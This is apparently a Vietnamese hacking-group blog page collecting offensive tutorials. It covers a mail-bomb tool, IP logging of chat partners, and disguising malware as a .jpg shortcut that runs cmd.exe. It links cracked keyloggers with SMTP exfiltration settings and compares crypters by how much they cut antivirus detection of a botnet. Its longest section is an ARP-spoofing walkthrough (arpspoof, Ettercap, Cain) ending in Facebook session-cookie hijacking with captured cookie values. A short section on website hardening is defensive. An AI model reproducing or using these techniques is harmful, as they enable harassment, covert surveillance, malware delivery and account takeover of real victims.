Chúng Tôi Là Át Chủ Bài


Tool Bom Mail MaxBomber








+ Tool boom mail rất tốt với tính năng mỗi lần gửi chủ đề khác nhau bằng cách tự động thêm các mã khác nhau nên không bị trùng và gộp lại thành 1 mail và vào inbox 100%
- + Tốc độ tấn công: tầm 30 mail / phút.
- + Có thể sử dụng nhiều mail tấn công 1 mail và dấn đến tình trạng ngập lụt è Mail victim có thể bị khóa tạm thời đến vĩnh viễn.



Link download: http://www.mediafire.com/?bbfxq2yqfhbfkkr
Pass download: ceh.vn
Pass bảo vệ : soleil_vhb


p/s: cài đặt file dotNetFx40_Full_setup.exe nếu tool báo lỗi.


Kiểm tra virus:http://virusscan.jotti.org/en/scanresult/b2d31269789443142087fef4d09564c246243ea7/aac03a3ce1f2bebc5109d298abcf1ab2307a17ee
 

Xem Ip Bạn Chát

Download 2 file ip.php và ip_log.txt về và up lên host ( Có thể dung host free)
Chmod file ip_log.txt về 777
Rồi gửi link file ip.php cho bạn chat. Ví dụ: http://www.vhbgroup.net/ip.php ( Có thẻ rename file ip.php )
Sau đó ip bạn chat sẽ gửi về file ip_log.txt. View file đó và xem ip: http://www.vhbgroup.net/ip_log.txt







Các link trên chỉ mang tính chất demo



http://www.mediafire.com/?g0alqv3yziz3idq
pass unlock: soleil_vhb
pass download: ceh.vn
 

[Tut] Đính kèm virus vào file ảnh

Bước 1: Bỏ dấu tích “hide extensions for known file types”











Bước 2: Tạo 1 forder trên destop, Ví dụ: soleil


Bỏ file virus vào forder soleil, virus thường có đuôi là .exe. Trong bài này tôi sẽ thay virus bằng phần mền putty.exe chẳng hạn và sẽ đính kèm phần mền này vào file ảnh có đuôi là jpg.




Bước 3: Tạo “Shortcut”

Click chuột phải vào phần mền và chọn “create shortcut”








Bước 4: Chèn vào file ảnh


Rename file putty.exe thành file .jpg. Ví dụ: soleil.jpg


Click chuột phải vào file “putty.exe – Shortcut” và chọn “properties”








Thay Target: “C:\Users\Soleil\Desktop\soleil\putty.exe” thành “C:\WINDOWS\system32\cmd.exe /c soleil.jpg”
Chọn change icon, và thay thế bằng 1 icon của file ảnh.


http://www.iconarchive.com/search?q=jpg
http://findicons.com/search/jpg













Bước 5: Chạy file ảnh đính kèm virus




Rename file “putty.exe – Shortcut” thành file .jpg, ví dụ: “ducdung08clc.jpg”
Bây giờ ta đã được 1 file ảnh là ducdung08clc.jpg có đính kèm virus. Sẽ dễ dàng đánh lừa được victim để họ click vào đó. Trong bài tut này, virus đã được thay thể bằng phần mền puty.
-















1 điều khá hay là khi xem trong “Task manager”, file đang thực thi trên máy vẫn là .jpg ( Soleil.jpg), Không có dấu hiệu có hiện tượng virus đang chạy ngầm. Có thể qua mắt được victim dễ dàng.












Demo: http://www.mediafire.com/?nlhdgfimypto613 ( Đảm bảo tuyệt đối ko có virus)


Pass unlock là: ceh.vn
 

Các phần mềm keylogger không thể bỏ qua

Trong tất cả các keylogger đã sử dụng thì soleil kết nhất là hai phần mền: "Ardamax, Perfect" với cách sử dụng khá đơn giản và đầy đủ các tính năng: Ghi lại thao tác bàn phím, chụp destop, chụp webcam, link website đã vào, Create trojan, gửi mail, thiết lập thời gian gửi, đính kèm phần mền, chạy chế độ ẩn,.....






1 - Ardamax keylogger



Ardramax là phần mên keylogger đầy đủ các tính năng với cách sử dụng gần như là đơn giản nhất và được rất nhiều người ưa chuộng.




Hướng dẫn sử dụng Ardamax keylogger


link download: ( Bao gồm cả key)

http://www.mediafire.com/?9q7ajn3585okmmw



2 - Perfect Keylogger






Hướng dẫn sử dụng Perfect Keylogger


Đối với phần mền perfect keylogger nhiều bạn thường mắc ở cấu hình smtp kết nối để gửi thông tin về mail, theo kinh nghiệm sử dụng, soleil thường cấu hình mail với aol tỷ lệ thành công nhiều hơn là gmail:


Ví dụ về cấu hình mail:

send to: ducdung123@aol.com
Smtp: smtp.aol.com
Username: ducdung123
Password: ***********






Link download: (bao gồm cả key)

http://www.mediafire.com/?f3p774f9odwf9ft




Pass unlock: soleil_vhb
Pass giải nén: ceh.vn ( Nếu có )
 

Một số phần mền Mã Hóa Virus Free

1- 07-12-12 Crypter


- Click vào file và chọn path tới file virus
- Click vào stub và chọn path tới file stub.exe ( cùng thư mục với file 07-12-12 Crypter.exe )
- Sau đó tùy chọn các chức năng và Encrypt




- Trong trường hợp này Soleil sẽ lấy demo với file virus là con bot được tạo từ tool botnet Di5
- Hình ảnh check file virus khi chưa mã hóa:






- Với con bot này thì nó bị phát hiện 31/42 phần mền anti virus.

- Hình ảnh con bot di5 sau khi được mã hóa với 07-12-12 Crypter. Nó đã bypass anti được 1 nửa và chỉ còn bị phát hiện 15/42 phần mền anti virus.







-


Link download: http://www.mediafire.com/?3pdsmkkto519lzc



2- Haxor – Aio




- Tool này có nhiều chức năng hơn so với tool 07-12-12 Crypter như binder, extension Spoofer, Icon changer…
- Click vào Crypter chọn path file virus, Soleil sẽ lấy ví dụ đôi với con bot Di5 như ở trên.






- Khi mã hóa con bot của di5 đó với Haxor – Aio thì chỉ còn 9/42 phần mền antivirus phát hiện, 1 kết quả không tồi.


- Hình ảnh demo:






http://www.mediafire.com/?dcvu78og6yiy1om




3- Chrome Crypter v2


- Browse thư nhất dùng để dẫn tới path file virus
- Browse thứ 2 dùng để change icon cho virus
- Browse thứ 3 dùng để gắn virus vào 1 chương trình ( binder)




- Cũng với con bot tạo bởi Di5 đó, khi được mã hóa với Chrome Crypter v.2 thì còn 18/42 phần mền antivirus phát hiện
- Hình ảnh demo:






http://www.mediafire.com/?596oxa45qhgvg1g



4- Amnesia


- Tool encrypt Amnesia này rất đầy đủ các chưc năng như thay đổi icon, đính kèm phần mền, thể hiện thông báo, download, spoofer, pumper… Trong các tool free thì tool này soleil cũng khá kết nhất với các chức năng của nó.








- Khả năng bypass của nó cũng khá tốt, chỉ còn 10/41 phần mền anti phát hiện đối với con bot được tạo bởi Di5.






http://www.mediafire.com/?u66cdyajykm17g7


Toàn bộ pass các link download trên (nếu có ):
pass unlock: soleil_vhb
pass giải nén: ceh.vn


Đây là những Tool free, Vì vậy bài tut này mang tính chất giới thiệu và tham khảo, không hứa hẹn kỳ vọng nhiều về việc ứng dụng nó. Thực chất hiện giờ chỉ cần mã hóa qua đc kis, bkav, cmc, avg, avira là xem như đã thành công. Trong bài tut tiếp theo về mã hóa Soleil sẽ demo mã hóa FUD theo phương thức hexing! Tuy phức tạp 1 chút nhưng thu được kết quả mĩ mãn hơn. ^^
 

Ebooks Hacking Chọn Lọc

Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ.


1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng viêtk


http://www.mediafire.com/view/?2kd8k4ri9jlfh68
Tài liệu này được viết bởi cutynhangheo - Admin HCE theo kiểu biên dịch lại từ Ebook tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.


2 – Tấn công và bảo vệ hệ thống

http://www.mediafire.com/view/?oe6vgwigw3h7sc2


Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet – Trojan-Backdoor, Gmail Hacking, Website Hacking ...


3 – Elite Collection HVA


http://www.mediafire.com/?1a46wavdgj121rb
Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry, How to be a Hacker...


4 – Ghi Nhớ Ubuntu


http://www.mediafire.com/view/?p6s1pv966a44rcl
Ebook ghi nhớ các lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu, tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.


5 - The Hacker's Underground Handbook


Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay quanh hacking như : programming, linux, password, Network Hacking, Wireless Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết – Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm dolla.



1 số Ebook khác:


- Ebook Group HCE - Hacking + Crack = Enjoin
http://www.mediafire.com/?t9z633ovjnfa7rj


- Ebook Group BYG – BeYeuGroup
http://www.mediafire.com/?6cqwgstt5zz2u2u


- CEH version tiêng việt
http://www.mediafire.com/?1j8ulawa7jbya33


- The Web Application Hacker’s Handbook
http://www.mediafire.com/view/?q2lnrgb70jtj169


- Hacker Web Exploitation
http://www.mediafire.com/?hzlacnv5sxddpje


- CEH V.7 - Certified Ethical Hacker
http://www.mediafire.com/?n24cd59flriik35


- CHFI - Computer Hacking Forensic Investigator

http://www.mediafire.com/?4kwnoo0jji5p95v

- Ebook SQLI- Editor by Headshot

Tất cả các password download là: soleil_vhb



Vì mới comeback nên soleil cũng chưa tổng hợp được đầy đủ tất cả các tài liệu hay trên giới hacking, tuy nhiên topic này sẽ được cập nhật thường xuyên ^^
 

Share trang df edit by Gin



Mới edit xong. Các bạn down về rồi edit lại nhé.
 

Hướng dẫn bảo mật website hạn chế local Attack



Hướng dẫn config website để hạn chế tối đa việc hacker xâm nhập

1> CHMOD (Change Mode):

Đầu tiên là CHMOD: (Host linux)

CHMOD (Change Mode) : có thể hiểu nôm na là thiết lập quyền trên file hoặc thư mục trong website .

Thông thường CHMOD sẽ là 644, 755 hoặc 777 ! Vậy 664 là gì ?

Những con số này được tính như sau: Read" (Đọc): viết tắt là "r" có giá trị là 4

Write" (Ghi / Chỉnh sửa): viết tắt là "w" có giá trị là 2

Execute" (Thực thi): viết tắt là "x" có giá trị là 1

Do vậy 7 là quyền cao nhất có đủ 3 quyền: r-w-x

Vậy tại sao có 3 số để biểu diễn: VD: 777 ! 3 số này là đại diện cho 3 nhóm người dùng !

Owner: Chủ sở hữu của file/thư mục

Group: Nhóm mà Owner là thành viên

Public / Others/ Everybody: những người còn lại

Tóm lại 664: Nhóm Owner ->đọc( 4 ) + ghi,sửa (2)

Nhóm Group ->đọc( 4 ) + ghi,sửa (2)

Nhóm Khác ->đọc( 4 )



Như vậy muốn bảo mật những file chứa thông tin nhạy cảm như: config.php( file chứa thông tin database) , index.php ( vì đa số hacker sẽ symlink file index để tìm ra file đường dẫn file chứa database) thì chúng ta set quyền là 400 ( Nhìn vào đây thì chỉ có Owner có quyền đọc )

Ngoài ra thư mục public_html: 710 hoặc 711, thư mục admin: 711

per1
Tiếp tục
per2




2> Phân quyền trong databse:

Bỏ quyền drop : tránh trường hợp bị drop database
per3


Tiếp tục

per4


Bỏ DROP
per5


Ngoài ra nên backup database thường xuyên để đề phòng trường hợp xấu nhất xảy ra !

3> Sử dụng mật khẩu bảo vệ thư mục admin trong cpanel : xem bài viếtxem bài viết

4> Thường xuyên kiểm tra web xem đã bị up shell hay chưa ? bài viết tại đây



5> 1 số cách khác: mã hóa code file config.php bằng những công cụ trên internet như: zendguard , ioncube, hoặc đơn giản có thể dùng trang web online sau: http://www.byterun.com/free-php-encoder.php



Trên đây chỉ là hạn chế đến mức tối đa thôi !Ngoài ra còn phải phụ thuộc vào config của server nữa ! Mong bài viết sẽ giúp ích cho các bạn !
 

Local attack for newbie

hàng leech nên không biest die lúc nào đâu nhé
Vì mình mong muốn là Việt Nam mình sẽ sinh ra được những hacker tài năng để không phải chịu lép vế trước Tung Cẩu.

TUT sử dụng symlink,

http://www.mediafire.com/?q8eds6438u30m9d 

pass : kid1412
 

[LAN ATTACK] Man In The Middle

Phương pháp tấn công đc hình dung qua chính cái tên gọi của nó.Là một phương pháp cơ bản và làm nền tảng chung cho nhiều kĩ thuật tấn công.Ở đây attacker đóng vai trò là người trung gian,đứng giữa,giả mạo trong phiên làm việc giữa victim và một máy chủ nào đó.Mọi gói tin xuất phát từ victim đến máy chủ hay ngược lại đề đi qua máy attacker ,nếu đc attacker forward .
Xem mô hình dưới đây:



Ta thấy attacker đã chèn vào giữa phiên giao dịch của victim và máy chủ.Vậy làm sao attacker làm đc điều này.Và các công cụ sniffer dùng phương pháp MITM như thế nào.
Đầu tiên nói sơ qua cơ chế giao tiếp bình thường giữa victim và máy chủ khi attacker chưa tác động lên hệ thống.Khi 2 host giao tiếp với nhau,chúng cần địa chỉ nguồn và địa chỉ đích đến.Và do hiện nay người ta dùng các giao thức khác nhau trên tầng giao vận(IP,IPX) ,chính vì thế dẫn đến việc không thống nhất đối với các thiết bị .Có thể thiết bị này tương thích nhưng thiết bị khác lại không.Chính vì vậy sinh ra việc dùng ip MAC.Xem như là một tiêu chuẩn chung tương thích với các thiết bị khác nhau.Nhưng làm sao để từ IP có thể phiên ra ip MAC và ngược lại.Việc phiên dịch này là do giao thức ARP (address resolution protocol) thực hiện.
Ta xem xét một bản tin ARP để thấy được việc phiên dịch IP-MAC.Một bản tin arp gồm các trường sau:



Hardware type :Qui định kiểu của phần cứng.
HW addr length : Cho biết độ dài của địa chỉ MAC ( ghi bằng mã hex)
Protocol type : Cho biết kiểu của giao thức.
Protocol addr length : Cho biết độ dài của địa chỉ IP
Opcode : thể hiện đây là bản tin request (1) hay là bản tin reply (2)
Các trường còn lại như source hardware address ,source protocol address,destination hardware addres ,destination protocol addresss cho biết địa chị vật lí và địa chỉ ip của máy nguồn và máy đích.

Một bản tin arp với thông tin cụ thể có dạng như sau:


Ở ví dụ này miêu tả một bản tin của một máy có IP là 192.168.1.1 gửi một bản tin request đến máy có ip là 192.168.1.2
Quá trình đi của gói tin như sau.Máy có ip LÀ 192.168.1.1 gửi một request trong đó có chứ ip và mac của nó,kèm với ip đích đến. Module address resolution sẽ có nhiệm vụ chuyển địa chỉ logic của đích đến thành địa chỉ vật lí.Tiếp tục nó so sánh cặp địa chỉ này với bảng ánh xạ lưu trên ARP cache.Nếu trung lặp thì nó ghi các giá trị này vào ,rồi gửi lại về máy chủ dưới dạng bản tin reply .Nếu không trùng lặp thì nó sẽ gửi tiếp bản tin ARP request đến địa chỉ đích là địa chỉ broadcast (để có thể hỏi hết tất cả máy có trong mạng lan).

Hình thức tấn công này chỉ có tác dụng thực trên mạng LAN.Vì nếu trên mạng WAN,Tại các nut mạng router nó có khả năng ngăn chặn các gói tin broadcast.



Căn cứ vào cơ chế như vậy.Attacker đứng giữa.Liên tục gửi những gói arp reply cho máy chủ và liên tục gửi các gói arp request cho victim.Làm cho cả máy chủ lẫn victim đều hiểu nhầm đối tượng mình đang giao tiếp là ai.

Hiện nay có rất nhiều tool dùng nguyên lí này để sniff các thông tin .Ví dụ như dsnif,ettercap,cain ,sniffer pro,wireshark,Network Monitor,Ethereal.
Chúng ta sẽ demo các công cụ này.
Đây tiên là demo giả mạo arp trên backtrack [ Phần này mình lấy từ blog capuchino cho nhanh ]


Đầu tiên mở terminal lên.
sửa lại file ip_forward bằng lệnh echo và toán tử viết chèn vào cuối file >> (để cho phép ip đc forward)
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
xong rồi đọc lại file này xem đã ghi thành công chưa nhé,nếu nhận đc là 1 thì là oke
cat /proc/sys/net/ipv4/ip_forward
giả sử ip của victim là 192.168.201.129
trong đó gateway là 192.168.201.2

ta tiếp tục
arpspoof -i eth0 -t 192.168.201.2 192.168.201.129
(nó update lại bản arp cache)
sau khi nó chạy,thì terminal này bị busy,ta ko thể thao tác lệnh tiếp,vì nó phải giữ session lại.
Rất may trên backtrack cho phép ta thao tác đa nhiệm.
Mở 1 terminal khác lên,gõ screen rồi enter .


trên terminal mới tiếp tục
arpspoof -i eth0 -t 192.168.201.129 192.168.201.2



lúc này thì 2 terminal trong nó như vậy.

tiếp tục do terminal này bận nên ta tiếp tục mở 1 terminal khác,type screen và enter.
trên terminal mới ta mở trình driftnet lên
type:sudo driftnet -i eth0.



tiếp tục mở terminal mới,type screen rồi type tiêp
sudo urlsnarf -i eth0
bây giờ nó sẽ lắng nghe trên các port 80,8080 hoặc 3128


Giải sử bi giờ trên victim vào trang google tìm với từ khóa capuchino chẳng hạn nha
thì trên driftnet của mình sẽ bắt đc gói tin hình ảnh truyền về ip 192.168.201.129


đây là hình ảnh trên victim:



đây là hình ảnh get đc và hiện lên driftnet:



ương tự như thế,đối với các trang khác mình cũng xem đc thông tin.biết đc victim làm gì.Xem trên terminal.
Chẳng hạn như xem hình dưới đây,ta thấy victim đang lượn lờ trong vhbsystem



Cain and Abel:

Mình demo bộ tool này trên win7.
đầu tiên down Cain and Abel về ở đây http://www.softpedia.com/progDownloa...oad-38678.html
trước khi cài đặt Cain cần cài đặt WinPcap trước,để tí nữa nó tự tìm card mạng cho mình.Tải WinPcap về ở đâyhttp://www.winpcap.org/install/default.htm
Sau khi cài đặt ,trước khi chạy thì ta chú ý tắt tường lửa đi.Vì để tường lửa có thể sẽ không thực hiện đc.
Mở cain lên chúng ta thấy giao diện ban đầu của nó như sau :


Đầu tiên cần phải config cho nó,ta vào Configure chọn Netword Adapter thích hợp



Sau đó chúng ta scan danh sách host có trong mạng nội bộ.Ấn vào biểu tưởng dấu + màu xanh (hoặc chọn trên thành menu File -Add to list).Rồi Ok



CHuyển sang tab ARP



Kích lên khung trống rồi chọn tiếp biểu tượng + màu xanh để add host victim cần tấn công vào (File - Add to list )

Ta kích chọn vào địa chỉ default gateway đầu tiên rồi Add để add tất cả các host trong mạng nội bộ vào.Tiếp theo chọn victim cần tấn công giả mạo ARP rồi ok.Victim mình chọn ở đây có IP là 192.168.247.128 .



ta kích tiếp vào đối tượng ta vừa add vào rồi chọn Start Arp



Ta sẽ thấy từ chế độ idle nó sẽ chuyển sang chế độ Poisonning



bây giờ ta sẽ chờ đợi lắng nghe và bắt các gói tin khi victim giao tiếp với máy chủ.Ví dụ như trên máy victim thực hiện một giao tiếp với giao thức http .Ta bắt được như sau



tương tự với nhiều gói tin khác cũng thế.Căn bản của việc dùng cain là vậy.Có thời gian các bạn nên nghiên cứu kĩ hơn.Các chức năng mà cain tích hợp.Có rất nhiều lựa chọn làm đa dạng quá trình tấn công,ví dụ như có các option giúp chúng ta chọn một IP hoặc MAC giả mạo,hoặc có thể dùng chính địa chỉ của chúng ta.Vân Vân.
Ettercap:Bộ công cụ được mệnh danh là Lord of the tokenring.

Trên thực tế thì đây là bộ công cụ dùng để phân tích các gói tin đc trao đổi với máy tính.Nguyên tắc làm việc của nó cũng là giả danh địa chi MAC để cho máy đích và máy nguồn nhầm tưởng là đang trao đổi thông tin với nhau.Nhưng thực chất là qua máy có cài ettercap.
Mình sẽ trình bày demo về ettercap với Backtrack .Nếu không có bạn có thể tải về và chạy trên mọi hệ điều hành.
Bộ ettercap đc hỗ trợ nhiều interface khác nhau.
ở đây có 4 interface,mình demo với curses GUI và GTK+GUI
để vào giao diện curses GUI ta gõ dòng lệnh
#ettercap -C
Giao diện xuất hiện như thế này


Ta cấu hình cho nó như sau
Đầu tiên vào Sniff - Unified sniffing để chọn card mạng





Lúc này đang ở chế độ lắng nghe.Nếu trên mạng nội bộ có một máy nào đó thao tác giao tiếp với mạng,Thì ta có thể bắt đc các bản tin này.



ở đây cho thấy có một victim trong mạng lan và máy đich có địa chỉ ip 115.77.208.206 có trao đổi các gói tin với nhau với nội dung thông tin có chứa user và pass.Đây là chúng ta bắt gói tin một cách tràn lan trên mạng nội bộ.Muốn bắt đc chính xác từ một victim nào đó.Mà chúng ta mục đích sẵn.Thì đầu tiên ta scan host
Trên menu bar chọn Hosts - Scan for host
Nó sẽ scan toàn bộ netmask cho chúng ta.Tiếp theo ta chọn tấn công theo hình thức giả mạo ARP .Vào menu MITM - Arp poisoning



Chọn xong nó sẽ hiện ra khung báo chọn parameter,ta bỏ qua không chọn nhấn enter.Nhận đc User messages như sau:



Để tìm tên victim chúng ta muốn bắt bản tin tao vào Menu :View -Connections



Gói host nào đang ở chế độ active thì ta có thể bắt đc.Và xem nó bằng cách kick vào host đấy,bản tin xem được đc viết dưới dạng đã mã hóa



Để lưu lại thì ta chọn Logging - Log all packets and infos....
để sau này ta có thể xem lại.

Đối với interface dùng GTK+GUI thì dễ dùng hơn.Mở lên bằng lệnh
#ettercap -G




Chọn card mạng



Scan host:Hosts->Scan for hosts



Chọn tiếp :Hosts ->host list hiện ra như sau



Add gateway vào target 2 và victim vào target 1 , rồichọn Mitm -Arp Poisoning , hiện ra optional parameters



tiếp theo Start - Start sniffing để bắt đầu sniff thôi .
Đây là một bản tin có chứa user và pass ta sniff đc từ victim

[COLOR="Silver"]

---------- Post added at 01:15 PM ---------- Previous post was at 01:11 PM ----------

Bộ công cụ test wireshark (Phần này lấy từ blog capuchino .Lần trứoc hướng dẫn capuchino,nên giờ lấy lại công gõ).

đầu tiên ta tải bộ công cụ scan wireshark ở trang chủ wireshark.org về cài đặt.Trước khi cài đặt cái này thì phải tại winPcap về đã.Để tí nữa nó tìm card mạng cho mình [ trang chủ của winPcap ở đây nhéhttp://www.winpcap.org/install/default.htm ].
Tải xong về mở lên thì đại loại nó có giao diện như thế này



Ta kích vào Interface list để hiện ra danh sách card mạng.
Chọn card mạng mình cần scan.



Sau khi khung capture Interfaces hiện lên thì chọn card [ hoặc network cần scan nhé ].
Bấm start.
Sau khi scan một lúc thì cho nó dừng lại.Scan vừa đủ thôi,chứ chờ nó xong lâu lắm.Tùy lúc mà cho nó dừng lại .

ta thấy các session mà nó scan đc,thông qua các giao thức khác nhau .



Ta mở khung search lên để dễ tìm thấy mục tiêu (Ctrl f)
hoặc Edit /Find packages

Mở lên rồi ta chọn các tùy chọn như search string,Package details

[IMG]https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7EzySTusVNbkb6XG1KuZshC1kblf42pWcpvb3mQmEK9gT7PZ-1k22wxTjr3RRyyeS88s3D2PVtQWnF4usQatkNhRlUnO2sSnyILctLLEuJTY1jRzfa5VH0RybvpsOPMHNfIS4WiQWaGw/s320/04.png[IMG]

rồi nhập vào chữ datr (cái này là kinh nghiệm thôi,trong cookie facebook nó có chữ này ấy mà.

sau khi seach xong
ta tìm đc một đối tượng như sau



ta thấy ngay dòng [truncated ] cookie:datr.....
copy dòng này ra notepad,lấy 2 trường sau,cho vào addon cookie manage của firefox
c_user=100004847377632; xs=60%3AWKLE4Ztc9cjSBg%3A0%3A1363298090
để copy đc thì ta kích chuột phải chọn copy/bytes/Printable text only



sau đó add các trường này vào cookie manager



bấm add ,tương tự nhập cho trường xs



f5 và xem thành quả
 

Copyright © Group Át Chủ Bài / Template by :Template X5- ShaDow